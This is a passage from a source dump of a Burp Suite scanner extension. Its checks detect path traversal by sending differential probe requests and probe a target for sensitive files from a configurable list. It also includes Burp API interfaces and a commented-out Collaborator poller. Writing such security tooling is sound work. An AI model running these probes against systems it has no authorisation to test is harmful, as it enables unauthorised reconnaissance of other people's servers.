be used to build scan requests for particular payloads. 54 | * @return A list of IScanIssue objects, or null 55 | * if no issues are identified. 56 | */ 57 | List doActiveScan( 58 | IHttpRequestResponse baseRequestResponse, 59 | IScannerInsertionPoint insertionPoint); 60 | 61 | /** 62 | * The Scanner invokes this method when the custom Scanner check has 63 | * reported multiple issues for the same URL path. This can arise either 64 | * because there are multiple distinct vulnerabilities, or because the same 65 | * (or a similar) request has been scanned more than once. The custom check 66 | * should determine whether the issues are duplicates. In most cases, where 67 | * a check uses distinct issue names or descriptions for distinct issues, 68 | * the consolidation process will simply be a matter of comparing these 69 | * features for the two issues. 70 | * 71 | * @param existingIssue An issue that was previously reported by this 72 | * Scanner check. 73 | * @param newIssue An issue at the same URL path that has been newly 74 | * reported by this Scanner check. 75 | * @return An indication of which issue(s) should be reported in the main 76 | * Scanner results. The method should return -1 to report the 77 | * existing issue only, 0 to report both issues, and 78 | * 1 to report the new issue only. 79 | */ 80 | int consolidateDuplicateIssues( 81 | IScanIssue existingIssue, 82 | IScanIssue newIssue); 83 | } 84 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/PowerScanner/ScanPathTraversal.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.PowerScanner; 2 | 3 | import BrianW.AKA.BigChan.Tools.HitRst; 4 | import BrianW.AKA.BigChan.Tools.Utils; 5 | import burp.*; 6 | 7 | public class ScanPathTraversal extends Reporter { 8 | protected IBurpExtenderCallbacks callbacks; 9 | protected IExtensionHelpers helpers; 10 | 11 | public ScanPathTraversal(IBurpExtenderCallbacks callbacks, IExtensionHelpers helpers) { 12 | super(callbacks, helpers); 13 | this.callbacks = callbacks; 14 | this.helpers = helpers; 15 | } 16 | 17 | public IScanIssue doScanPathTraversal(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) { 18 | byte[] resp = baseRequestResponse.getResponse(); 19 | byte[] req = baseRequestResponse.getRequest(); 20 | String baseName = insertionPoint.getInsertionPointName(); 21 | String insertionPointType = Utils.bytesToHexString(new byte[]{insertionPoint.getInsertionPointType()}, 1); 22 | String baseValue = insertionPoint.getBaseValue(); 23 | 24 | if (baseValue.contains("/")) { 25 | String strPositive = "/./"; 26 | String strNegative = "/z/"; 27 | byte[] reqPositive = insertionPoint.buildRequest((baseValue.replace("/", strPositive)).getBytes()); 28 | IHttpRequestResponse pairPositive = callbacks.makeHttpRequest( 29 | baseRequestResponse.getHttpService(), 30 | reqPositive 31 | ); 32 | byte[] respPositive = pairPositive.getResponse(); 33 | byte[] reqNegative = insertionPoint.buildRequest((baseValue.replace("/", strNegative)).getBytes()); 34 | IHttpRequestResponse pairNegative = callbacks.makeHttpRequest( 35 | baseRequestResponse.getHttpService(), 36 | reqNegative 37 | ); 38 | byte[] respNegative = pairNegative.getResponse(); 39 | HitRst hit = hit(resp, respPositive, respNegative, strPositive, strNegative); 40 | if (hit.getCdoe() > 0) { 41 | return reporter( 42 | "PathTraversal found", 43 | String.format("param: %s
" + 44 | "HitCode: %s

" + 45 | "compareRestEvil SAME:
%s
" + 46 | "compareRestEvil Different:
%s
" 47 | , 48 | baseName, 49 | hit.getCdoe(), 50 | hit.getCompareWithNegative_Same(), 51 | hit.getCompareWithNegative_Diff() 52 | ), 53 | "High", 54 | "Firm", 55 | baseRequestResponse, 56 | pairPositive, 57 | pairNegative 58 | ); 59 | } 60 | return null; 61 | } 62 | String strPositive = "/"; 63 | String strNegative = "z"; 64 | byte[] reqPositive = insertionPoint.buildRequest((strPositive + baseValue).getBytes()); 65 | IHttpRequestResponse pairPositive = callbacks.makeHttpRequest( 66 | baseRequestResponse.getHttpService(), 67 | reqPositive 68 | ); 69 | byte[] respPositive = pairPositive.getResponse(); 70 | byte[] reqNegative = insertionPoint.buildRequest((strNegative + baseValue).getBytes()); 71 | IHttpRequestResponse pairNegative = callbacks.makeHttpRequest( 72 | baseRequestResponse.getHttpService(), 73 | reqNegative 74 | ); 75 | byte[] respNegative = pairNegative.getResponse(); 76 | HitRst hit = hit(resp, respPositive, respNegative, strPositive, strNegative); 77 | if (hit.getCdoe() > 0) { 78 | return reporter( 79 | "PathTraversal found", 80 | String.format("param: %s
" + 81 | "HitCode: %s

" + 82 | "The same between base response and negative response:
%s
" + 83 | "The difference between base response and negative response:
%s
" + 84 | "The same between base response and positive response:
%s
" + 85 | "The difference between base response and positive response:
%s
" 86 | , 87 | baseName, 88 | hit.getCdoe(), 89 | hit.getCompareWithNegative_Same(), 90 | hit.getCompareWithNegative_Diff(), 91 | hit.getCompareWithPositive_Same(), 92 | hit.getCompareWithPositive_Diff() 93 | ), 94 | "High", 95 | "Firm", 96 | baseRequestResponse, 97 | pairPositive, 98 | pairNegative 99 | ); 100 | } 101 | return null; 102 | } 103 | } 104 | -------------------------------------------------------------------------------- /src/main/java/burp/IBurpCollaboratorClientContext.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IBurpCollaboratorClientContext.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.List; 13 | 14 | /** 15 | * This interface represents an instance of a Burp Collaborator client context, 16 | * which can be used to generate Burp Collaborator payloads and poll the 17 | * Collaborator server for any network interactions that result from using those 18 | * payloads. Extensions can obtain new instances of this class by calling 19 | * IBurpExtenderCallbacks.createBurpCollaboratorClientContext(). 20 | * Note that each Burp Collaborator client context is tied to the Collaborator 21 | * server configuration that was in place at the time the context was created. 22 | */ 23 | public interface IBurpCollaboratorClientContext 24 | { 25 | 26 | /** 27 | * This method is used to generate new Burp Collaborator payloads. 28 | * 29 | * @param includeCollaboratorServerLocation Specifies whether to include the 30 | * Collaborator server location in the generated payload. 31 | * @return The payload that was generated. 32 | * 33 | * @throws IllegalStateException if Burp Collaborator is disabled 34 | */ 35 | String generatePayload(boolean includeCollaboratorServerLocation); 36 | 37 | /** 38 | * This method is used to retrieve all interactions received by the 39 | * Collaborator server resulting from payloads that were generated for this 40 | * context. 41 | * 42 | * @return The Collaborator interactions that have occurred resulting from 43 | * payloads that were generated for this context. 44 | * 45 | * @throws IllegalStateException if Burp Collaborator is disabled 46 | */ 47 | List fetchAllCollaboratorInteractions(); 48 | 49 | /** 50 | * This method is used to retrieve interactions received by the Collaborator 51 | * server resulting from a single payload that was generated for this 52 | * context. 53 | * 54 | * @param payload The payload for which interactions will be retrieved. 55 | * @return The Collaborator interactions that have occurred resulting from 56 | * the given payload. 57 | * 58 | * @throws IllegalStateException if Burp Collaborator is disabled 59 | */ 60 | List fetchCollaboratorInteractionsFor(String payload); 61 | 62 | /** 63 | * This method is used to retrieve all interactions made by Burp Infiltrator 64 | * instrumentation resulting from payloads that were generated for this 65 | * context. 66 | * 67 | * @return The interactions triggered by the Burp Infiltrator 68 | * instrumentation that have occurred resulting from payloads that were 69 | * generated for this context. 70 | * 71 | * @throws IllegalStateException if Burp Collaborator is disabled 72 | */ 73 | List fetchAllInfiltratorInteractions(); 74 | 75 | /** 76 | * This method is used to retrieve interactions made by Burp Infiltrator 77 | * instrumentation resulting from a single payload that was generated for 78 | * this context. 79 | * 80 | * @param payload The payload for which interactions will be retrieved. 81 | * @return The interactions triggered by the Burp Infiltrator 82 | * instrumentation that have occurred resulting from the given payload. 83 | * 84 | * @throws IllegalStateException if Burp Collaborator is disabled 85 | */ 86 | List fetchInfiltratorInteractionsFor(String payload); 87 | 88 | /** 89 | * This method is used to retrieve the network location of the Collaborator 90 | * server. 91 | * 92 | * @return The hostname or IP address of the Collaborator server. 93 | * 94 | * @throws IllegalStateException if Burp Collaborator is disabled 95 | */ 96 | String getCollaboratorServerLocation(); 97 | } 98 | -------------------------------------------------------------------------------- /src/main/java/burp/IMessageEditorTab.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IMessageEditorTab.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.awt.Component; 13 | 14 | /** 15 | * Extensions that register an 16 | * IMessageEditorTabFactory must return instances of this 17 | * interface, which Burp will use to create custom tabs within its HTTP message 18 | * editors. 19 | */ 20 | public interface IMessageEditorTab 21 | { 22 | /** 23 | * This method returns the caption that should appear on the custom tab when 24 | * it is displayed. Note: Burp invokes this method once when the tab 25 | * is first generated, and the same caption will be used every time the tab 26 | * is displayed. 27 | * 28 | * @return The caption that should appear on the custom tab when it is 29 | * displayed. 30 | */ 31 | String getTabCaption(); 32 | 33 | /** 34 | * This method returns the component that should be used as the contents of 35 | * the custom tab when it is displayed. Note: Burp invokes this 36 | * method once when the tab is first generated, and the same component will 37 | * be used every time the tab is displayed. 38 | * 39 | * @return The component that should be used as the contents of the custom 40 | * tab when it is displayed. 41 | */ 42 | Component getUiComponent(); 43 | 44 | /** 45 | * The hosting editor will invoke this method before it displays a new HTTP 46 | * message, so that the custom tab can indicate whether it should be enabled 47 | * for that message. 48 | * 49 | * @param content The message that is about to be displayed, or a zero-length 50 | * array if the existing message is to be cleared. 51 | * @param isRequest Indicates whether the message is a request or a 52 | * response. 53 | * @return The method should return 54 | * true if the custom tab is able to handle the specified 55 | * message, and so will be displayed within the editor. Otherwise, the tab 56 | * will be hidden while this message is displayed. 57 | */ 58 | boolean isEnabled(byte[] content, boolean isRequest); 59 | 60 | /** 61 | * The hosting editor will invoke this method to display a new message or to 62 | * clear the existing message. This method will only be called with a new 63 | * message if the tab has already returned 64 | * true to a call to 65 | * isEnabled() with the same message details. 66 | * 67 | * @param content The message that is to be displayed, or 68 | * null if the tab should clear its contents and disable any 69 | * editable controls. 70 | * @param isRequest Indicates whether the message is a request or a 71 | * response. 72 | */ 73 | void setMessage(byte[] content, boolean isRequest); 74 | 75 | /** 76 | * This method returns the currently displayed message. 77 | * 78 | * @return The currently displayed message. 79 | */ 80 | byte[] getMessage(); 81 | 82 | /** 83 | * This method is used to determine whether the currently displayed message 84 | * has been modified by the user. The hosting editor will always call 85 | * getMessage() before calling this method, so any pending 86 | * edits should be completed within 87 | * getMessage(). 88 | * 89 | * @return The method should return 90 | * true if the user has modified the current message since it 91 | * was first displayed. 92 | */ 93 | boolean isModified(); 94 | 95 | /** 96 | * This method is used to retrieve the data that is currently selected by 97 | * the user. 98 | * 99 | * @return The data that is currently selected by the user. This may be 100 | * null if no selection is currently made. 101 | */ 102 | byte[] getSelectedData(); 103 | } 104 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/PowerScanner/ScanSensitiveFiles.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.PowerScanner; 2 | 3 | import BrianW.AKA.BigChan.Tools.Global; 4 | import BrianW.AKA.BigChan.Tools.Utils; 5 | import burp.*; 6 | 7 | import java.net.MalformedURLException; 8 | import java.net.URL; 9 | import java.util.ArrayList; 10 | import java.util.List; 11 | 12 | public class ScanSensitiveFiles extends Reporter { 13 | protected IBurpExtenderCallbacks callbacks; 14 | protected IExtensionHelpers helpers; 15 | private IBurpCollaboratorClientContext collaboratorContext; 16 | 17 | public ScanSensitiveFiles(IBurpExtenderCallbacks callbacks, IExtensionHelpers helpers) { 18 | super(callbacks, helpers); 19 | this.callbacks = callbacks; 20 | this.helpers = helpers; 21 | collaboratorContext = callbacks.createBurpCollaboratorClientContext(); 22 | } 23 | 24 | public List doScanSensiveFiles(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) { 25 | String[] fileList = Global.config.getConfigSensitiveFiles_value().split("\n"); 26 | List issues = new ArrayList<>(); 27 | IHttpRequestResponse pairNegative = fetchURL(baseRequestResponse, "/" + Utils.getRandomString(10)); 28 | for (String file : fileList) { 29 | file = file.replace("\r", ""); 30 | if ("".equals(file.replace(" ", ""))) { 31 | continue; 32 | } 33 | file = "/" + file; 34 | IHttpRequestResponse pairSensitiveFile = null; 35 | try { 36 | pairSensitiveFile = fetchURLWithNewReq(baseRequestResponse, file); 37 | } catch (Exception e) { 38 | callbacks.printOutput("error in doScanSensiveFiles: " + Utils.getStackMsg(e)); 39 | return null; 40 | } 41 | 42 | assert pairSensitiveFile != null; 43 | short code = helpers.analyzeResponse(pairSensitiveFile.getResponse()).getStatusCode(); 44 | callbacks.printOutput(String.format("Scanning sensitive file: %s, code: %d", file, code)); 45 | IResponseVariations responseAnalyze = callbacks.getHelpers().analyzeResponseVariations( 46 | pairSensitiveFile.getResponse(), 47 | pairNegative.getResponse() 48 | ); 49 | if ( 50 | (Utils.rangeInDefined(code, 200, 399) || code == 403) 51 | && responseAnalyze.getAttributeValue("visible_text", 0) != responseAnalyze.getAttributeValue("visible_text", 1) 52 | ) 53 | { 54 | 55 | issues.add( 56 | reporter( 57 | "Sensitive File found", 58 | String.format("Filename: %s
" + 59 | "Response Status Code: %d
", 60 | // "Response SensitiveFile: %s
" + 61 | // "Response Negative: %s
", 62 | file, 63 | code 64 | // callbacks.getHelpers().base64Encode(pairSensitiveFile.getResponse()), 65 | // callbacks.getHelpers().base64Encode(pairNegative.getResponse()) 66 | ), 67 | "Low", 68 | "Firm", 69 | pairSensitiveFile, 70 | pairNegative 71 | ) 72 | ); 73 | } 74 | } 75 | return issues; 76 | } 77 | 78 | private IHttpRequestResponse fetchURL(IHttpRequestResponse basePair, String newPath) { 79 | String path = this.helpers.analyzeRequest(basePair).getUrl().getPath(); 80 | String newReq = new String(basePair.getRequest()).replace(path, newPath); 81 | return callbacks.makeHttpRequest(basePair.getHttpService(), newReq.getBytes()); 82 | } 83 | 84 | private IHttpRequestResponse fetchURLWithNewReq(IHttpRequestResponse basePair, String path) throws MalformedURLException { 85 | URL oldURL = this.helpers.analyzeRequest(basePair).getUrl(); 86 | String baseURL = Utils.getBaseUrl(oldURL); 87 | byte[] newReq = this.helpers.buildHttpRequest(new URL(baseURL + path)); 88 | return callbacks.makeHttpRequest(basePair.getHttpService(), newReq); 89 | } 90 | 91 | } 92 | -------------------------------------------------------------------------------- /src/main/java/burp/IInterceptedProxyMessage.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IInterceptedProxyMessage.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.net.InetAddress; 13 | 14 | /** 15 | * This interface is used to represent an HTTP message that has been intercepted 16 | * by Burp Proxy. Extensions can register an 17 | * IProxyListener to receive details of proxy messages using this 18 | * interface. * 19 | */ 20 | public interface IInterceptedProxyMessage 21 | { 22 | /** 23 | * This action causes Burp Proxy to follow the current interception rules to 24 | * determine the appropriate action to take for the message. 25 | */ 26 | int ACTION_FOLLOW_RULES = 0; 27 | /** 28 | * This action causes Burp Proxy to present the message to the user for 29 | * manual review or modification. 30 | */ 31 | int ACTION_DO_INTERCEPT = 1; 32 | /** 33 | * This action causes Burp Proxy to forward the message to the remote server 34 | * or client, without presenting it to the user. 35 | */ 36 | int ACTION_DONT_INTERCEPT = 2; 37 | /** 38 | * This action causes Burp Proxy to drop the message. 39 | */ 40 | int ACTION_DROP = 3; 41 | /** 42 | * This action causes Burp Proxy to follow the current interception rules to 43 | * determine the appropriate action to take for the message, and then make a 44 | * second call to processProxyMessage. 45 | */ 46 | int ACTION_FOLLOW_RULES_AND_REHOOK = 0x10; 47 | /** 48 | * This action causes Burp Proxy to present the message to the user for 49 | * manual review or modification, and then make a second call to 50 | * processProxyMessage. 51 | */ 52 | int ACTION_DO_INTERCEPT_AND_REHOOK = 0x11; 53 | /** 54 | * This action causes Burp Proxy to skip user interception, and then make a 55 | * second call to processProxyMessage. 56 | */ 57 | int ACTION_DONT_INTERCEPT_AND_REHOOK = 0x12; 58 | 59 | /** 60 | * This method retrieves a unique reference number for this 61 | * request/response. 62 | * 63 | * @return An identifier that is unique to a single request/response pair. 64 | * Extensions can use this to correlate details of requests and responses 65 | * and perform processing on the response message accordingly. 66 | */ 67 | int getMessageReference(); 68 | 69 | /** 70 | * This method retrieves details of the intercepted message. 71 | * 72 | * @return An IHttpRequestResponse object containing details of 73 | * the intercepted message. 74 | */ 75 | IHttpRequestResponse getMessageInfo(); 76 | 77 | /** 78 | * This method retrieves the currently defined interception action. The 79 | * default action is 80 | * ACTION_FOLLOW_RULES. If multiple proxy listeners are 81 | * registered, then other listeners may already have modified the 82 | * interception action before it reaches the current listener. This method 83 | * can be used to determine whether this has occurred. 84 | * 85 | * @return The currently defined interception action. Possible values are 86 | * defined within this interface. 87 | */ 88 | int getInterceptAction(); 89 | 90 | /** 91 | * This method is used to update the interception action. 92 | * 93 | * @param interceptAction The new interception action. Possible values are 94 | * defined within this interface. 95 | */ 96 | void setInterceptAction(int interceptAction); 97 | 98 | /** 99 | * This method retrieves the name of the Burp Proxy listener that is 100 | * processing the intercepted message. 101 | * 102 | * @return The name of the Burp Proxy listener that is processing the 103 | * intercepted message. The format is the same as that shown in the Proxy 104 | * Listeners UI - for example, "127.0.0.1:8080". 105 | */ 106 | String getListenerInterface(); 107 | 108 | /** 109 | * This method retrieves the client IP address from which the request for 110 | * the intercepted message was received. 111 | * 112 | * @return The client IP address from which the request for the intercepted 113 | * message was received. 114 | */ 115 | InetAddress getClientIpAddress(); 116 | } 117 | -------------------------------------------------------------------------------- /src/main/java/burp/IScanIssue.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScanIssue.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to retrieve details of Scanner issues. Extensions can 14 | * obtain details of issues by registering an IScannerListener or 15 | * by calling IBurpExtenderCallbacks.getScanIssues(). Extensions 16 | * can also add custom Scanner issues by registering an 17 | * IScannerCheck or calling 18 | * IBurpExtenderCallbacks.addScanIssue(), and providing their own 19 | * implementations of this interface. Note that issue descriptions and other 20 | * text generated by extensions are subject to an HTML whitelist that allows 21 | * only formatting tags and simple hyperlinks. 22 | */ 23 | public interface IScanIssue 24 | { 25 | 26 | /** 27 | * This method returns the URL for which the issue was generated. 28 | * 29 | * @return The URL for which the issue was generated. 30 | */ 31 | java.net.URL getUrl(); 32 | 33 | /** 34 | * This method returns the name of the issue type. 35 | * 36 | * @return The name of the issue type (e.g. "SQL injection"). 37 | */ 38 | String getIssueName(); 39 | 40 | /** 41 | * This method returns a numeric identifier of the issue type. See the Burp 42 | * Scanner documentation for a listing of all the issue types. 43 | * 44 | * @return A numeric identifier of the issue type. 45 | */ 46 | int getIssueType(); 47 | 48 | /** 49 | * This method returns the issue severity level. 50 | * 51 | * @return The issue severity level. Expected values are "High", "Medium", 52 | * "Low", "Information" or "False positive". 53 | * 54 | */ 55 | String getSeverity(); 56 | 57 | /** 58 | * This method returns the issue confidence level. 59 | * 60 | * @return The issue confidence level. Expected values are "Certain", "Firm" 61 | * or "Tentative". 62 | */ 63 | String getConfidence(); 64 | 65 | /** 66 | * This method returns a background description for this type of issue. 67 | * 68 | * @return A background description for this type of issue, or 69 | * null if none applies. A limited set of HTML tags may be 70 | * used. 71 | */ 72 | String getIssueBackground(); 73 | 74 | /** 75 | * This method returns a background description of the remediation for this 76 | * type of issue. 77 | * 78 | * @return A background description of the remediation for this type of 79 | * issue, or null if none applies. A limited set of HTML tags 80 | * may be used. 81 | */ 82 | String getRemediationBackground(); 83 | 84 | /** 85 | * This method returns detailed information about this specific instance of 86 | * the issue. 87 | * 88 | * @return Detailed information about this specific instance of the issue, 89 | * or null if none applies. A limited set of HTML tags may be 90 | * used. 91 | */ 92 | String getIssueDetail(); 93 | 94 | /** 95 | * This method returns detailed information about the remediation for this 96 | * specific instance of the issue. 97 | * 98 | * @return Detailed information about the remediation for this specific 99 | * instance of the issue, or null if none applies. A limited 100 | * set of HTML tags may be used. 101 | */ 102 | String getRemediationDetail(); 103 | 104 | /** 105 | * This method returns the HTTP messages on the basis of which the issue was 106 | * generated. 107 | * 108 | * @return The HTTP messages on the basis of which the issue was generated. 109 | * Note: The items in this array should be instances of 110 | * IHttpRequestResponseWithMarkers if applicable, so that 111 | * details of the relevant portions of the request and response messages are 112 | * available. 113 | */ 114 | IHttpRequestResponse[] getHttpMessages(); 115 | 116 | /** 117 | * This method returns the HTTP service for which the issue was generated. 118 | * 119 | * @return The HTTP service for which the issue was generated. 120 | */ 121 | IHttpService getHttpService(); 122 | 123 | } 124 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/Tools/InteractionServer.java: -------------------------------------------------------------------------------- 1 | //package BrianW.AKA.BigChan.Tools; 2 | // 3 | //import burp.*; 4 | // 5 | //import java.nio.charset.StandardCharsets; 6 | //import java.util.*; 7 | //import java.util.concurrent.ConcurrentHashMap; 8 | // 9 | //public class InteractionServer extends Thread { 10 | // private final ConcurrentHashMap collaboratorPayloadList; 11 | // private final IBurpCollaboratorClientContext collaboratorContext; 12 | // protected String threadID; 13 | // protected IBurpExtenderCallbacks callbacks; 14 | // 15 | // public InteractionServer(IBurpExtenderCallbacks callbacks) { 16 | // this.collaboratorPayloadList = new ConcurrentHashMap(); 17 | // this.callbacks = callbacks; 18 | // this.collaboratorContext = callbacks.createBurpCollaboratorClientContext(); 19 | // this.threadID = utils.getRandomString(5); 20 | // this.callbacks.printOutput("InteractionServer inited, ThreadID: " + this.threadID); 21 | // } 22 | // 23 | // @Override 24 | // public void run() { 25 | // try { 26 | // checkCollaboratorPayloadList(); 27 | // } catch (Exception e) { 28 | // callbacks.printError(utils.getStackMsg(e)); 29 | // } 30 | // this.callbacks.printOutput("InteractionServer stopped, ThreadID: " + this.threadID); 31 | // } 32 | // 33 | // public void addToPairList(String collaboratorPayload, CollaboratorData collaboratorData) { 34 | // this.collaboratorPayloadList.put(collaboratorPayload, collaboratorData); 35 | // } 36 | // 37 | // public IBurpCollaboratorClientContext getCollaboratorContext() { 38 | // return collaboratorContext; 39 | // } 40 | // 41 | // private void checkCollaboratorPayloadList() throws Exception { 42 | // List interactions = new ArrayList<>(); 43 | // do { 44 | //// this.callbacks.printOutput("CollaboratorPayloadList amount: " + collaboratorPayloadList.size()); 45 | // Iterator> it = this.collaboratorPayloadList.entrySet().iterator(); 46 | //// for (Map.Entry collaboratorPayload : this.collaboratorPayloadList.entrySet()) { 47 | // while (it.hasNext()){ 48 | // ConcurrentHashMap.Entry collaboratorPayload = it.next(); 49 | // this.callbacks.printOutput("checking collaborator: " + collaboratorPayload.getValue() + ", key: " + collaboratorPayload.getKey()); 50 | // interactions = this.collaboratorContext.fetchCollaboratorInteractionsFor(collaboratorPayload.getKey()); 51 | // if (interactions.size() > 0) { 52 | // if (collaboratorPayload.getValue().sig.length()>0){ 53 | // for (IBurpCollaboratorInteraction interaction : interactions) { 54 | // if (interaction.getProperty("type").equalsIgnoreCase("dns") ){ 55 | // try{ 56 | // this.callbacks.printOutput("checking collaborator: " + collaboratorPayload + ", records: " + utils.extractDnsData(utils.Base64Decode(interaction.getProperty("raw_query").getBytes(StandardCharsets.UTF_8))).Records); 57 | // if (utils.extractDnsData(utils.Base64Decode(interaction.getProperty("raw_query").getBytes(StandardCharsets.UTF_8))).Records.contains(collaboratorPayload.getValue().sig)){ 58 | // this.callbacks.addScanIssue(collaboratorPayload.getValue().issue); 59 | //// this.callbacks.printOutput("remove issue1 collaborator: " + collaboratorPayload + ", ThreadID: " + this.threadID); 60 | //// this.collaboratorPayloadList.remove(collaboratorPayload.getKey()); 61 | // it.remove(); 62 | // break; 63 | // } 64 | // }catch(Exception e){ 65 | // callbacks.printError(String.format("Error in processProxyMessage: %s", utils.getStackMsg(e))); 66 | // } 67 | // } 68 | // } 69 | // }else{ 70 | // this.callbacks.addScanIssue(collaboratorPayload.getValue().issue); 71 | //// this.callbacks.printOutput("remove issue2 collaborator: " + collaboratorPayload + ", ThreadID: " + this.threadID); 72 | // it.remove(); 73 | // } 74 | // continue; 75 | // } 76 | // if ((new Date()).getTime() - collaboratorPayload.getValue().cdate.getTime() > 10 * 1000) { 77 | //// this.callbacks.printOutput("remove timeout collaborator: " + collaboratorPayload + ", ThreadID: " + this.threadID); 78 | // it.remove(); 79 | // } 80 | // } 81 | // try { 82 | // Thread.sleep(3000); 83 | // } catch (InterruptedException e) { 84 | // break;//捕获到异常之后,执行break跳出循环。 85 | // } 86 | // } while (!this.isInterrupted()); 87 | // } 88 | //} 89 | -------------------------------------------------------------------------------- /src/main/java/com/r4v3zn/fofa/core/DO/User.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2019. r4v3zn. 3 | * Licensed under the Apache License, Version 2.0 (the "License"); 4 | * you may not use this file except in compliance with the License. 5 | * You may obtain a copy of the License at 6 | * 7 | * http://www.apache.org/licenses/LICENSE-2.0 8 | * 9 | * Unless required by applicable law or agreed to in writing, software 10 | * distributed under the License is distributed on an "AS IS" BASIS, 11 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | * See the License for the specific language governing permissions and 13 | * limitations under the License. 14 | */ 15 | 16 | package com.r4v3zn.fofa.core.DO; 17 | 18 | import com.r4v3zn.fofa.core.enmus.UserVipLevelEnum; 19 | 20 | /** 21 | * Title: User 22 | * Descrption: this is User 23 | * Date:2019-06-07 16:00 24 | * Email:woo0nise@gmail.com 25 | * Company:www.j2ee.app 26 | * @author R4v3zn 27 | * @version 1.0.0 28 | */ 29 | public class User { 30 | /** 31 | * user email 32 | */ 33 | private String email; 34 | 35 | /** 36 | * username; 37 | */ 38 | private String userName; 39 | 40 | /** 41 | * fcion 42 | */ 43 | private Integer fCoin; 44 | 45 | /** 46 | * vip 47 | */ 48 | private Boolean isVip; 49 | 50 | /** 51 | * vip level 52 | */ 53 | private UserVipLevelEnum vipLevel; 54 | 55 | /** 56 | * is verified 57 | */ 58 | private Boolean isVerified; 59 | 60 | /** 61 | * avatar 62 | */ 63 | private String avatar; 64 | 65 | /** 66 | * message count 67 | */ 68 | private Integer message; 69 | 70 | /** 71 | * fofacli version 72 | */ 73 | private String fofacliVersion; 74 | 75 | /** 76 | * fofa server 77 | */ 78 | private Boolean fofaServer; 79 | 80 | /** 81 | * User 82 | * @param email email 83 | * @param userName name 84 | * @param fCoin FCoin 85 | * @param isVip is vip 86 | * @param vipLevel vip level 87 | * @param isVerified is verified 88 | * @param avatar avatar link 89 | * @param message message count 90 | * @param fofacliVersion fofacli version 91 | * @param fofaServer fofaServer 92 | */ 93 | public User(String email, String userName, Integer fCoin, Boolean isVip, UserVipLevelEnum vipLevel, Boolean isVerified, String avatar, Integer message, String fofacliVersion, Boolean fofaServer) { 94 | this.email = email; 95 | this.userName = userName; 96 | this.fCoin = fCoin; 97 | this.isVip = isVip; 98 | this.vipLevel = vipLevel; 99 | this.isVerified = isVerified; 100 | this.avatar = avatar; 101 | this.message = message; 102 | this.fofacliVersion = fofacliVersion; 103 | this.fofaServer = fofaServer; 104 | } 105 | 106 | public void setEmail(String email) { 107 | this.email = email; 108 | } 109 | 110 | public void setUserName(String userName) { 111 | this.userName = userName; 112 | } 113 | 114 | public void setfCoin(Integer fCoin) { 115 | this.fCoin = fCoin; 116 | } 117 | 118 | public void setVip(Boolean vip) { 119 | isVip = vip; 120 | } 121 | 122 | public void setVipLevel(UserVipLevelEnum vipLevel) { 123 | this.vipLevel = vipLevel; 124 | } 125 | 126 | public void setVerified(Boolean verified) { 127 | isVerified = verified; 128 | } 129 | 130 | public void setAvatar(String avatar) { 131 | this.avatar = avatar; 132 | } 133 | 134 | public void setMessage(Integer message) { 135 | this.message = message; 136 | } 137 | 138 | public void setFofacliVersion(String fofacliVersion) { 139 | this.fofacliVersion = fofacliVersion; 140 | } 141 | 142 | public void setFofaServer(Boolean fofaServer) { 143 | this.fofaServer = fofaServer; 144 | } 145 | 146 | public String getEmail() { 147 | return email; 148 | } 149 | 150 | public String getUserName() { 151 | return userName; 152 | } 153 | 154 | public Integer getfCoin() { 155 | return fCoin; 156 | } 157 | 158 | public Boolean getVip() { 159 | return isVip; 160 | } 161 | 162 | public UserVipLevelEnum getVipLevel() { 163 | return vipLevel; 164 | } 165 | 166 | public Boolean getVerified() { 167 | return isVerified; 168 | } 169 | 170 | public String getAvatar() { 171 | return avatar; 172 | } 173 | 174 | public Integer getMessage() { 175 | return message; 176 | } 177 | 178 | public String getFofacliVersion() { 179 | return fofacliVersion; 180 | } 181 | 182 | public Boolean getFofaServer() { 183 | return fofaServer; 184 | } 185 | 186 | @Override 187 | public String toString() { 188 | return "User{" + 189 | "email='" + email + '\'' + 190 | ", userName='" + userName + '\'' + 191 | ", fCoin=" + fCoin + 192 | ", isVip=" + isVip + 193 | ", vipLevel=" + vipLevel + 194 | ", isVerified=" + isVerified + 195 | ", avatar='" + avatar + '\'' + 196 | ", message=" + message + 197 | ", fofacliVersion='" + fofacliVersion + '\'' + 198 | ", fofaServer=" + fofaServer + 199 | '}'; 200 | } 201 | } 202 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/Tools/RequestHelper.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.Tools; 2 | 3 | import org.apache.http.HttpHost; 4 | import org.apache.http.auth.AuthScope; 5 | import org.apache.http.auth.Credentials; 6 | import org.apache.http.auth.UsernamePasswordCredentials; 7 | import org.apache.http.client.CredentialsProvider; 8 | import 